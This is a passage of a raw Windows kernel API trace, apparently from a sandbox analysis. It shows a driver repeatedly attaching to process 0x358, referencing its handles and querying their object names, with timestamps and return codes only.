ApcState=0xffffd000ac0cf400) [0289.933] ObReferenceObjectByHandle (in: Handle=0x258, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698d5db0, HandleInformation=0x0) returned 0x0 [0289.933] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.933] PsReleaseProcessExitSynchronization () returned 0x2 [0289.933] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fe1 [0289.933] ObQueryNameString (in: Object=0xffffe000698d5db0, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.933] ObfDereferenceObject (Object=0xffffe000698d5db0) returned 0x7ffe [0289.934] IoCompleteRequest () returned 0x0 [0289.934] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.934] PsAcquireProcessExitSynchronization () returned 0x0 [0289.934] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.934] ObReferenceObjectByHandle (in: Handle=0x274, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698d62b0, HandleInformation=0x0) returned 0x0 [0289.934] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.934] PsReleaseProcessExitSynchronization () returned 0x2 [0289.934] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fe0 [0289.934] ObQueryNameString (in: Object=0xffffe000698d62b0, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.934] ObfDereferenceObject (Object=0xffffe000698d62b0) returned 0x800e [0289.934] IoCompleteRequest () returned 0x0 [0289.934] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.934] PsAcquireProcessExitSynchronization () returned 0x0 [0289.934] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.934] ObReferenceObjectByHandle (in: Handle=0x278, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698d7ca0, HandleInformation=0x0) returned 0x0 [0289.934] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.934] PsReleaseProcessExitSynchronization () returned 0x2 [0289.934] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fdf [0289.934] ObQueryNameString (in: Object=0xffffe000698d7ca0, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.934] ObfDereferenceObject (Object=0xffffe000698d7ca0) returned 0x7ff2 [0289.934] IoCompleteRequest () returned 0x0 [0289.934] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.934] PsAcquireProcessExitSynchronization () returned 0x0 [0289.934] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.934] ObReferenceObjectByHandle (in: Handle=0x27c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698d89a0, HandleInformation=0x0) returned 0x0 [0289.934] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.934] PsReleaseProcessExitSynchronization () returned 0x2 [0289.934] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fde [0289.934] ObQueryNameString (in: Object=0xffffe000698d89a0, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.934] ObfDereferenceObject (Object=0xffffe000698d89a0) returned 0x7ffe [0289.934] IoCompleteRequest () returned 0x0 [0289.934] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.934] PsAcquireProcessExitSynchronization () returned 0x0 [0289.934] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.934] ObReferenceObjectByHandle (in: Handle=0x280, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698d8ec0, HandleInformation=0x0) returned 0x0 [0289.934] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.934] PsReleaseProcessExitSynchronization () returned 0x2 [0289.934] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fdd [0289.934] ObQueryNameString (in: Object=0xffffe00069340230, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.934] ObfDereferenceObject (Object=0xffffe000698d8ec0) returned 0x7fca [0289.934] IoCompleteRequest () returned 0x0 [0289.934] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.934] PsAcquireProcessExitSynchronization () returned 0x0 [0289.935] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.935] ObReferenceObjectByHandle (in: Handle=0x284, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698d72d0, HandleInformation=0x0) returned 0x0 [0289.935] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.935] PsReleaseProcessExitSynchronization () returned 0x2 [0289.935] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fdc [0289.935] ObQueryNameString (in: Object=0xffffe000698d72d0, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.935] ObfDereferenceObject (Object=0xffffe000698d72d0) returned 0x7ffe [0289.935] IoCompleteRequest () returned 0x0 [0289.935] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.935] PsAcquireProcessExitSynchronization () returned 0x0 [0289.935] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.935] ObReferenceObjectByHandle (in: Handle=0x28c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698d8090, HandleInformation=0x0) returned 0x0 [0289.935] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.935] PsReleaseProcessExitSynchronization () returned 0x2 [0289.935] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fdb [0289.935] ObQueryNameString (in: Object=0xffffe000698d8090, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.935] ObfDereferenceObject (Object=0xffffe000698d8090) returned 0x7ffc [0289.935] IoCompleteRequest () returned 0x0 [0289.935] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.935] PsAcquireProcessExitSynchronization () returned 0x0 [0289.935] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.935] ObReferenceObjectByHandle (in: Handle=0x294, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698d85d0, HandleInformation=0x0) returned 0x0 [0289.935] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.935] PsReleaseProcessExitSynchronization () returned 0x2 [0289.935] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fda [0289.935] ObQueryNameString (in: Object=0xffffe000698d85d0, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.935] ObfDereferenceObject (Object=0xffffe000698d85d0) returned 0x7fed [0289.935] IoCompleteRequest () returned 0x0 [0289.935] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.935] PsAcquireProcessExitSynchronization () returned 0x0 [0289.935] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.935] ObReferenceObjectByHandle (in: Handle=0x2dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698dc090, HandleInformation=0x0) returned 0x0 [0289.935] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.935] PsReleaseProcessExitSynchronization () returned 0x2 [0289.935] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fd9 [0289.936] ObQueryNameString (in: Object=0xffffe000698dc090, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.936] ObfDereferenceObject (Object=0xffffe000698dc090) returned 0x7ffe [0289.936] IoCompleteRequest () returned 0x0 [0289.936] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.936] PsAcquireProcessExitSynchronization () returned 0x0 [0289.936] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.936] ObReferenceObjectByHandle (in: Handle=0x2e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698dcb20, HandleInformation=0x0) returned 0x0 [0289.936] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.936] PsReleaseProcessExitSynchronization () returned 0x2 [0289.936] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fd8 [0289.936] ObQueryNameString (in: Object=0xffffe000698dcb20, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.936] ObfDereferenceObject (Object=0xffffe000698dcb20) returned 0x7ffe [0289.936] IoCompleteRequest () returned 0x0 [0289.936] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.936] PsAcquireProcessExitSynchronization () returned 0x0 [0289.936] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.936] ObReferenceObjectByHandle (in: Handle=0x300, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b91df0, HandleInformation=0x0) returned 0x0 [0289.936] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.936] PsReleaseProcessExitSynchronization () returned 0x2 [0289.936] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fd7 [0289.936] ObQueryNameString (in: Object=0xffffe00069b91df0, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.936] ObfDereferenceObject (Object=0xffffe00069b91df0) returned 0x7ffe [0289.936] IoCompleteRequest () returned 0x0 [0289.936] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.936] PsAcquireProcessExitSynchronization () returned 0x0 [0289.936] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.936] ObReferenceObjectByHandle (in: Handle=0x3a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069968090, HandleInformation=0x0) returned 0x0 [0289.936] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.936] PsReleaseProcessExitSynchronization () returned 0x2 [0289.936] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fd6 [0289.936] ObQueryNameString (in: Object=0xffffe00069968090, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf380) returned 0xc00000bb [0289.936] ObfDereferenceObject (Object=0xffffe00069968090) returned 0x7ffe [0289.936] IoCompleteRequest () returned 0x0 [0289.936] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.936] PsAcquireProcessExitSynchronization () returned 0x0 [0289.936] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.936] ObReferenceObjectByHandle (in: Handle=0x4ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b8fdc0, HandleInformation=0x0) returned 0x0 [0289.936] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.936] PsReleaseProcessExitSynchronization () returned 0x2 [0289.936] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fd5 [0289.936] ObQueryNameString (in: Object=0xffffe00069b8fdc0, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.936] ObfDereferenceObject (Object=0xffffe00069b8fdc0) returned 0x800e [0289.936] IoCompleteRequest () returned 0x0 [0289.937] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.937] PsAcquireProcessExitSynchronization () returned 0x0 [0289.937] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.937] ObReferenceObjectByHandle (in: Handle=0x4cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b7f9e0, HandleInformation=0x0) returned 0x0 [0289.937] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.937] PsReleaseProcessExitSynchronization () returned 0x2 [0289.937] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fd4 [0289.937] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.937] ObfDereferenceObject (Object=0xffffe00069b7f9e0) returned 0x7fff [0289.937] IoCompleteRequest () returned 0x0 [0289.937] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.937] PsAcquireProcessExitSynchronization () returned 0x0 [0289.937] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.937] ObReferenceObjectByHandle (in: Handle=0x4d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b82c20, HandleInformation=0x0) returned 0x0 [0289.937] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.937] PsReleaseProcessExitSynchronization () returned 0x2 [0289.937] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fd3 [0289.937] ObQueryNameString (in: Object=0xffffe00069b82c20, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.937] ObfDereferenceObject (Object=0xffffe00069b82c20) returned 0x7f14 [0289.937] IoCompleteRequest () returned 0x0 [0289.937] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.937] PsAcquireProcessExitSynchronization () returned 0x0 [0289.937] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.937] ObReferenceObjectByHandle (in: Handle=0x4f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b83090, HandleInformation=0x0) returned 0x0 [0289.937] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.937] PsReleaseProcessExitSynchronization () returned 0x2 [0289.937] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fd2 [0289.937] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006a4087c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4087c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.937] ObfDereferenceObject (Object=0xffffe00069b83090) returned 0x7fff [0289.937] IoCompleteRequest () returned 0x0 [0289.937] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.937] PsAcquireProcessExitSynchronization () returned 0x0 [0289.937] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.937] ObReferenceObjectByHandle (in: Handle=0x4f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b838b0, HandleInformation=0x0) returned 0x0 [0289.937] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.937] PsReleaseProcessExitSynchronization () returned 0x2 [0289.937] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fd1 [0289.937] ObQueryNameString (in: Object=0xffffe00069b838b0, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.937] ObfDereferenceObject (Object=0xffffe00069b838b0) returned 0x7ffd [0289.937] IoCompleteRequest () returned 0x0 [0289.938] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.938] PsAcquireProcessExitSynchronization () returned 0x0 [0289.938] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.938] ObReferenceObjectByHandle (in: Handle=0x4f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b83740, HandleInformation=0x0) returned 0x0 [0289.938] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.938] PsReleaseProcessExitSynchronization () returned 0x2 [0289.938] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fd0 [0289.938] ObQueryNameString (in: Object=0xffffe00069b83740, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.938] ObfDereferenceObject (Object=0xffffe00069b83740) returned 0x7ffd [0289.938] IoCompleteRequest () returned 0x0 [0289.938] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.938] PsAcquireProcessExitSynchronization () returned 0x0 [0289.938] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.938] ObReferenceObjectByHandle (in: Handle=0x54c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069fd3950, HandleInformation=0x0) returned 0x0 [0289.938] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.938] PsReleaseProcessExitSynchronization () returned 0x2 [0289.938] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fcf [0289.938] ObQueryNameString (in: Object=0xffffe00072a93060, ObjectNameInfo=0xffffe0006a6dd7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6dd7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.938] ObfDereferenceObject (Object=0xffffe00069fd3950) returned 0x7ffb [0289.938] IoCompleteRequest () returned 0x0 [0289.938] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.938] PsAcquireProcessExitSynchronization () returned 0x0 [0289.938] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.938] ObReferenceObjectByHandle (in: Handle=0x59c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a019db0, HandleInformation=0x0) returned 0x0 [0289.938] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.938] PsReleaseProcessExitSynchronization () returned 0x2 [0289.938] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fce [0289.938] ObQueryNameString (in: Object=0xffffe0006a019db0, ObjectNameInfo=0xffffe0006a5067c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5067c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.938] ObfDereferenceObject (Object=0xffffe0006a019db0) returned 0x7fdf [0289.938] IoCompleteRequest () returned 0x0 [0289.938] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.938] PsAcquireProcessExitSynchronization () returned 0x0 [0289.938] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.938] ObReferenceObjectByHandle (in: Handle=0x5cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a345f20, HandleInformation=0x0) returned 0x0 [0289.938] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.938] PsReleaseProcessExitSynchronization () returned 0x2 [0289.938] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fcd [0289.938] ObQueryNameString (in: Object=0xffffe0006a345f20, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.938] ObfDereferenceObject (Object=0xffffe0006a345f20) returned 0x7ffe [0289.938] IoCompleteRequest () returned 0x0 [0289.938] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.938] PsAcquireProcessExitSynchronization () returned 0x0 [0289.938] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.938] ObReferenceObjectByHandle (in: Handle=0x5e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bc42e0, HandleInformation=0x0) returned 0x0 [0289.938] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.939] PsReleaseProcessExitSynchronization () returned 0x2 [0289.939] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fcc [0289.939] ObQueryNameString (in: Object=0xffffe00069bc42e0, ObjectNameInfo=0xffffe0006a6fe7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6fe7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.939] ObfDereferenceObject (Object=0xffffe00069bc42e0) returned 0x7ffe [0289.939] IoCompleteRequest () returned 0x0 [0289.939] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.939] PsAcquireProcessExitSynchronization () returned 0x0 [0289.939] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.939] ObReferenceObjectByHandle (in: Handle=0x5e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a288310, HandleInformation=0x0) returned 0x0 [0289.939] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.939] PsReleaseProcessExitSynchronization () returned 0x2 [0289.939] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fcb [0289.939] ObQueryNameString (in: Object=0xffffe0006a288310, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.939] ObfDereferenceObject (Object=0xffffe0006a288310) returned 0x7ffe [0289.939] IoCompleteRequest () returned 0x0 [0289.939] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.939] PsAcquireProcessExitSynchronization () returned 0x0 [0289.939] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.939] ObReferenceObjectByHandle (in: Handle=0x600, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a391d10, HandleInformation=0x0) returned 0x0 [0289.939] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.939] PsReleaseProcessExitSynchronization () returned 0x2 [0289.939] ObfDereferenceObject 